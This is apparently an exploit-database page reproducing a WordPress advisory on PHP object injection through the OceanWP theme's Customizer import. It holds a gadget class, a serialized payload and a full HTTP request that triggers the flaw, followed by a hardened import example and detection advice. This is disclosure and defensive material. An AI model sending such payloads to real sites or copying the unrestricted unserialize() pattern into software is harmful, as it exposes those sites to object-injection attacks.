## https://sploitus.com/exploit?id=WPEX-ID:22FD3F28-9036-4BD5-AD98-FF78BD1B51BC
To simulate a gadget chain, put the following code in a plugin (a minimal plugin header and the opening PHP tag are added so the file loads as a plugin):

```php
<?php
/* Plugin Name: Evil gadget (test only) */

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization"); // proves unserialize() reached __wakeup()
  }
}
```

Create a file named import.dat with the following content: `O:4:"Evil":0:{};`

Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)

Then view the response to the import request, which will contain the "Arbitrary deserialization" message.

```http
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]

-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream

O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"

oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"

166c9022e0
-----------------------------371888087213614698033751989022--
```
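The root cause of the PoC above is that the uploaded file is handed to `unserialize()` without restricting which classes may be instantiated, so any loadable class with `__wakeup()` or `__destruct()` becomes a gadget. The following added example (not code from the advisory or from the OceanWP project) reuses the `Evil` class and payload from the PoC to contrast that raw pattern with a hardened import path. The `import_customizer_*` function names, the `contains_object()` helper and the assumption that a legitimate export is a nested array of scalars are hypothetical.

```php
<?php
// Added example, not code from the advisory or from OceanWP. The Evil class and
// the payload string are taken from the PoC above; the import_* function names
// and the "export is nested arrays of scalars" assumption are hypothetical.

class Evil {
    public function __wakeup(): void {
        // The PoC calls die() here; this version only records that the magic method ran.
        echo "__wakeup() executed on attacker-controlled data\n";
    }
}

// Vulnerable pattern: file content goes straight into unserialize(), so any
// loadable class with __wakeup()/__destruct() is reachable as a gadget.
function import_customizer_vulnerable(string $raw)
{
    return unserialize($raw);
}

// Returns true if any object survives in the decoded structure. With
// allowed_classes => false every object is materialised as
// __PHP_Incomplete_Class, so this catches smuggled objects at any depth.
function contains_object($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Hardened pattern: forbid class instantiation during unserialize(), then
// reject anything that is not a plain array of scalars/arrays.
function import_customizer_hardened(string $raw): ?array
{
    $data = unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || contains_object($data)) {
        return null; // not a settings export; refuse it without touching it further
    }
    return $data;
}

$payload = 'O:4:"Evil":0:{}';

echo "Vulnerable import:\n";
import_customizer_vulnerable($payload);            // the __wakeup() line is printed

echo "Hardened import:\n";
var_dump(import_customizer_hardened($payload));    // NULL, no magic method ran

// A legitimate export (constructed sample) still round-trips through the hardened path.
$legit = serialize(['mods' => ['ocean_primary_color' => '#13aff0'], 'version' => '2.0']);
var_dump(import_customizer_hardened($legit) !== null); // bool(true)
```

`allowed_classes => false` (available since PHP 7.0) is the minimal change that stops `__wakeup()` from firing on this input; a stronger fix is to move the import format to something that cannot carry objects at all, such as JSON decoded with `json_decode()`. On the detection side, an import that yields `null` from the hardened path (or that contains `__PHP_Incomplete_Class` when inspected) is a clear signal of a tampered or attacker-supplied file and is worth logging with the uploading user's identity.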